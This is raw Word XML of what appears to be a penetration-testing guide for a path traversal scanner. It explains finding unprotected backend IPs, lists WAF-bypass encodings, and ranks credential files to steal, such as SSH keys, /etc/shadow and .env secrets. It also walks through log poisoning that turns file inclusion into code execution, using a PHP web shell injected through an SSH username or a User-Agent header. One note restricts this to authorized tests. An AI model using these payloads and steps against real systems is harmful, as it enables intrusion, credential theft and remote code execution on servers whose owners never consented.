        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Advanced Penetration Testing Tips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Backend IP Discovery (Shodan + nslookup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The most powerful path traversal findings happen on backend servers that are NOT protected by WAFs or CDNs. Here's how to find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Method 1: nslookup — find all IPs the domain resolves to</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup -type=A target.com 8.8.8.8</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Method 2: Shodan search (free account)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># In Shodan web UI search: hostname:target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Look for IPs with open ports 80/443/8080/8443</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Method 3: Check historical DNS records</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Use: https://securitytrails.com  or  https://viewdns.info</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Method 4: SSL certificate history (finds all subdomains + IPs)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Use: https://crt.sh/?q=%25.target.com</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Step 2: Test if backend IP is alive</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -sk https://BACKEND-IP -o /dev/null -w '%{http_code}\n'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -sk http://BACKEND-IP -o /dev/null -w '%{http_code}\n'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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔥 PRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="816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pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If the main domain returns a 403 or blank page but the backend IP returns 200, you have a WAF bypass opportunity. The backend has no protection.</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3.2  WAF Detection &amp; Bypass Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before scanning, detect if a WAF is present. If it is — PathTravScan's encoding variants are your bypass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Quick WAF probe — send an obvious payload and check response</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -sk 'https://target.com/app/../../../etc/passwd'</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WAF detected if you get: 403, 406, 419, 999, or a WAF error page</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># No WAF if you get: 200, 404, 500 with normal error content</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Bypass order to try (most likely to work first):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 1. Double URL encoding:  %252e%252e%252f</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 2. Unicode:              ..%c0%af</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 3. Filter bypass:        ....//</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 4. Mixed encoding:       ..%2f</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 5. Null byte:            ../../../etc/passwd%00.jpg</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3.3  Sensitive File Priority Order</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">After confirming traversal works, test these files in this order — ranked by bug bounty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32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556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60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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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/root/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="556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Private SSH key → full server access. Instant Critical finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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Password hashes → crack offline with hashcat. Leads to RCE if root hash is weak.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/proc/self/environ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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Live environment variables. May contain secret keys, tokens, DB passwords.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/var/www/html/.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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App secrets: DB_PASSWORD, API_KEY, JWT_SECRET — all in one file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/var/www/html/wp-config.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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WordPress DB credentials. Often reused as server passwords.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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User list + home directories. Confirms traversal. Shows all accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/var/log/auth.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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SSH login history. Reveals valid usernames, IPs, attack patterns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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/proc/net/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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Internal network topology — which internal ports are open.</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3.4  LFI to Remote Code Execution (LFI → RCE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Path traversal / LFI can be escalated to full Remote Code Execution using log poisoning. This is a CRITICAL escalation path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Poisoning via /var/log/auth.log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Step 1: Inject PHP payload into SSH auth log</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Connect via SSH with the payload as the username</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh '&lt;?php system($_GET["cmd"]); ?&gt;'@target.com</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Step 2: Read the log file via LFI (your injected PHP now executes)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'https://target.com/app/../../../../var/log/auth.log&amp;cmd=id'</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If it works, you get: uid=33(www-data) gid=33(www-data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Poisoning via /var/log/apache2/access.log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Step 1: Inject PHP into User-Agent header</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -H 'User-Agent: &lt;?php system($_GET["cmd"]); ?&gt;' https://target.com/</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Step 2: Trigger via LFI</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'https://target.com/app/../../../../var/log/apache2/access.log&amp;cmd=whoami'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BB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ IMPORTANT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Only demonstrate LFI→RCE in a controlled way during authorized pentests. For bug bounty, proving LFI with /etc/passwd + /etc/shadow is typically enough for a Critical report. Do NOT execute code on production systems.</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3.5  Reading /proc/self/environ for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/proc/self/environ contains ALL live environment variables</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Access it via LFI:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl 'https://target.com/app/../../../../proc/self/environ'</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What to look for in the output:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># DATABASE_URL=postgresql://user:PASSWORD@host/db</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># AWS_SECRET_ACCESS_KEY=xxx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># JWT_SECRET=xxx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># APP_KEY=base64:xxx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># REDIS_PASSWORD=xxx</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3.6  Windows Path Traversal Specifics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS servers and Windows apps have different path separators and target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Windows uses backslash — test both forward and back</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u https://target.com -p /app \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -f 'C:/Windows/win.ini' \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --wordlist wordlists/windows_payloads.txt</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Key Windows targets:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># C:/Windows/win.ini              — confirms traversal ([fonts] section)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># C:/Windows/System32/config/SAM  — password hashes (requires SYSTEM)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
